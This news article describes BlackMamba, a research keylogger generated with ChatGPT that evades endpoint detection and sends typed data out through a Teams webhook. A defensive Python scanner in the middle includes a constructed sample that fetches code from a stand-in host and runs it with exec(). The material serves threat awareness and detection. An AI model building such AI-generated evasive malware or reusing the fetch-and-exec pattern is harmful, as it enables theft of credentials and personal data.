Published on: March 17, 2023
A cybersecurity expert has developed a new form of malware called BlackMamba, which can bypass endpoint detection and response (EDR) filters. Jeff Sims, a researcher at the HYAS Institute, created the polymorphic keylogger using ChatGPT; the AI tool modifies the malware randomly based on the input it is given.
Sims took advantage of ChatGPT's language capabilities to produce the keylogger in Python 3. By running the generated code through Python's exec() function, he was able to create a unique Python script every time the AI tool was called, making the malware polymorphic and difficult for EDRs to detect.
Communications tools like Slack and MS Teams are attractive targets for cybercriminals as they provide access to an organization’s internal resources and are interconnected with many other essential tools.
According to a HYAS report, “BlackMamba can collect sensitive information, such as usernames, passwords, credit card numbers, and other personal or confidential data that a user types into their device. Once this data is captured, the malware uses MS Teams webhook to send the collected data to the malicious Teams channel, where it can be analyzed, sold on the dark web, or used for other nefarious purposes.”
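The two traits described above, code fetched from an AI service at runtime and handed to exec(), and a hard-coded webhook used for exfiltration, are both visible in a script's source. The following static check, an added example that is not HYAS's or Sims's code, parses a Python file with the standard ast module and flags exec()/eval() of remote-derived data and string constants that look like webhook endpoints. The list of "remote" APIs and the sample script are constructed assumptions for illustration.

```python
import ast

# Illustrative (not exhaustive) APIs whose return value is remote, attacker-influenced content.
REMOTE_SOURCES = {"requests.get", "requests.post", "urllib.request.urlopen", "openai.Completion.create"}
DYNAMIC_EXEC = {"exec", "eval"}

def dotted_name(node):
    # 'a.b.c' for a Name/Attribute chain, else None
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None

def is_remote_call(node):
    return isinstance(node, ast.Call) and dotted_name(node.func) in REMOTE_SOURCES

def uses_tainted(node, tainted):
    sub = list(ast.walk(node))
    return any(is_remote_call(n) for n in sub) or \
        any(isinstance(n, ast.Name) and n.id in tainted for n in sub)

def scan_source(src):
    """Return sorted [(lineno, finding)]; name-based, flow-insensitive taint tracking."""
    tree = ast.parse(src)
    tainted = set()
    # Pass 1: names assigned (directly or transitively) from a remote call.
    assigns = [n for n in ast.walk(tree) if isinstance(n, ast.Assign)]
    for node in sorted(assigns, key=lambda n: n.lineno):
        if uses_tainted(node.value, tainted):
            tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
    # Pass 2: sinks -- exec/eval of tainted data, and hard-coded webhook endpoints.
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and dotted_name(node.func) in DYNAMIC_EXEC:
            if any(uses_tainted(a, tainted) for a in node.args):
                findings.append((node.lineno, f"{dotted_name(node.func)}() of remote-derived content"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) and "webhook" in node.value.lower():
            findings.append((node.lineno, "hard-coded webhook URL"))
    return sorted(findings)

# Constructed sample reproducing only the fetch-then-exec shape (not real malware).
SAMPLE = '''import requests
resp = requests.post("https://llm.example.invalid/generate", json={"prompt": "..."})
code = resp.json()["text"]
exec(code)
HOOK = "https://example.invalid/webhook/PLACEHOLDER"
exec("print('static string: not flagged')")
'''
```

Running scan_source(SAMPLE) reports the exec() on line 4 and the webhook constant on line 5 while leaving the static exec() alone; the check is source-level only and does not see code that is built and executed purely in memory, so it complements rather than replaces runtime monitoring.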
To make the malware more portable and shareable, Sims describes using a free, open-source utility called auto-py-to-exe, which converts Python code into .exe files that can run on different devices, including Windows, Mac OS, and Linux systems. The malware can then be easily distributed within the target environment using email or social engineering schemes.
As ChatGPT’s machine learning capabilities advance, cybersecurity threats will become more sophisticated and difficult to detect. While automated security controls are essential, they are not foolproof, and cybercriminals can evade detection using advanced techniques.
It is therefore crucial for organizations to remain proactive in their cybersecurity strategies to protect against emerging threats. By staying vigilant and keeping up with cutting-edge research, organizations can stay ahead of threat actors and safeguard their systems against potential attacks.